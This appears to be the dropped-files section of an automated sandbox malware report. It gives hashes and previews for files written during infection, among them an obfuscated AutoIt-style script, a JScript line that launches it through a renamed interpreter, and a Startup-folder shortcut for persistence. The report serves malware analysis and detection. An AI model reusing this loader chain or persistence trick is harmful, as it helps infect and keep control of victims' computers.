                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n21wh1dt.bh5.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odq2f4a0.k0x.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4ydqt4r.eno.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-18 14-55-37-849.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.386483451061953
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                        MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                        SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                        SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                        SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                        Malicious:false
                                                                                        Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.377999400829084
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:v3bScQB+t9eutKovFFtqlLyKKlUW/Vl8jY8WYA2ko7CDNvtjLgfsdedEVIXrTIwj:jFE
                                                                                        MD5:7BC46388622589637F255CEA88F343ED
                                                                                        SHA1:58A341B0E0558839B589019A1AA6C496A4413A78
                                                                                        SHA-256:E9B8693882F2C0EA9DA6834C57EDEAE4F2F3B26BD3A2CC2A2D69D6085465F1D2
                                                                                        SHA-512:388A44D33EFB2B397D3E6AFCE838FD213856ACDA1FABD7106A1C06A00B254796D1EE6F0E135175D4499F6B8B0DE04DC26B30E9D73F98403E41FFA2C21B4364D5
                                                                                        Malicious:false
                                                                                        Preview:SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:874-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:882-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):35721
                                                                                        Entropy (8bit):5.411734085651151
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRC:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRY
                                                                                        MD5:BEE56D9DCCD49C2F6D6CE75E8006AE03
                                                                                        SHA1:D4D8D4D31F240159F2163B7AB83C281972C2B3FB
                                                                                        SHA-256:C47D6F3754C94C712E234816093E1D3CC773644B11C5931EB18AB85086C36F44
                                                                                        SHA-512:A7C86B60E7808860DCF80D803FB7A4BA01EC78DF240C8C1242A90AF0A12A2CED51DFB31F75100504CBF5294B54712B6D1F679BDED3F03AAD7D6E86240FEBD367
                                                                                        Malicious:false
                                                                                        Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\1b2ba331-a163-454b-a601-1f85bec6aaf4.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\8dda391b-5707-41bf-958a-e1482098af95.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\928501d6-7b1b-47e1-97c4-5d02540911af.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\fbfb60c9-7c29-4cce-a219-5175c173ae45.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                        MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                        SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                        SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                        SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                                                        Download File
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:ASCII text, with very long lines (1266)
                                                                                        Category:dropped
                                                                                        Size (bytes):1244516
                                                                                        Entropy (8bit):5.14211661950074
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:D8V+jcfSRkDQ5a1LYyQyFiI+SE71+KhpL0Wf+EpAlOQd:Dcd7cfr5sWLHfvA
                                                                                        MD5:1639C47BD901955B127D72B16450FDFA
                                                                                        SHA1:7D26B16C3B9883B1F283020896400F052DDEC689
                                                                                        SHA-256:0F0F7ECB51FA024C272A26A17330CCA3D10DAA5320B78971E1CF31CC6BD8F099
                                                                                        SHA-512:B75FBEA45DC3E96B974811EBB90E963C0B58308F80096BCD2BBDA2704CC8E4C39680F68403D3537F0F7FF6E1AF8418749C822A543192D324DACD23FE26D38026
                                                                                        Malicious:false
                                                                                        Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                                        Download File
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):4.775086341816013
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:RiMIpGXfeNH5E5wWAX+d4a+kEkD5yKXW/Zi+0/RaMl85uWAX+d4a+kEkD5yKXW/f:RiJbNHCwWD+vkDrXW/Zz0tl8wWD+vkDO
                                                                                        MD5:2BAB60AF26AA89CB37A2AABAC6162E25
                                                                                        SHA1:3D2DD35E294E4B76D2DDAA538076E29653255058
                                                                                        SHA-256:B6D42CD62ACDA7113CBE171A52618CE71EB5CB3B6A255F84C346A145B22CE298
                                                                                        SHA-512:3E29CFAC858B8659107EBD256403126487C5CDDF2DD9FF5BB0C5479281FFFA7983BB84369FC9FE9F1F5EF5DD4C4515DA271456D6DEC19034D9878859B8A3E63C
                                                                                        Malicious:true
                                                                                        Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                                        C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                                        Download File
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):893608
                                                                                        Entropy (8bit):6.62028134425878
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                        • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                        • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                        • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                                                        • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                                                        • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\BFmcYQ.exe

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1083904
                                                                                        Entropy (8bit):6.306437544300893
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:MrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvan1y:M2EYTb8atv1orq+pEiSDTj1VyvBa1
                                                                                        MD5:085AE742872C761A3485E075756E4781
                                                                                        SHA1:48EC6AEF243D0922CC595A8F20AF5ABED392D590
                                                                                        SHA-256:67BD9D9B91633B2EAFA5D01365015075C0B86C145C8E17DC019FC5781C667CB0
                                                                                        SHA-512:ED08DD6EA97C88C5D43ADCF597B6BCD6AEB11EF452E13013BB1A59C44E62528F07D16A1E16549B0D2338B21658841A98CCCAEB627EAE0BCB1B97F76B6606C1CA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d.....]g.........."......4...R.......T.........@..........................................`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):102
                                                                                        Entropy (8bit):4.939404205005729
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HRAbABGQaFyw3pYo0nacwRE2J5yKXW/Zi+URAAy:HRYF5yjocNwi23yKXW/Zzyy
                                                                                        MD5:A7D40A7BA6D8F0A99F90068D484E33C6
                                                                                        SHA1:FFF7A3AE229FD5FA0E1F8798D3830362F9EAB7F2
                                                                                        SHA-256:D29502D994513542511C29BBC2356913745C26FE6270055DBAFC5CC98D86F123
                                                                                        SHA-512:D1CAE20F0B0F9E39F9CEBAE7A170485440E5D9B3B035A80D9A5F04F76C395ECB5A9625AE4E36CAC6763D75C94181F3EF166D687F3D00270545248A7CC8CC2FE4
                                                                                        Malicious:true
                                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                                        C:\Users\user\AppData\Roaming\test.pdf

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PDF document, version 1.3, 3 pages
                                                                                        Category:dropped
                                                                                        Size (bytes):3986
                                                                                        Entropy (8bit):7.456004459274474
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                                        MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                                        SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                                        SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                                        SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                                        Malicious:false
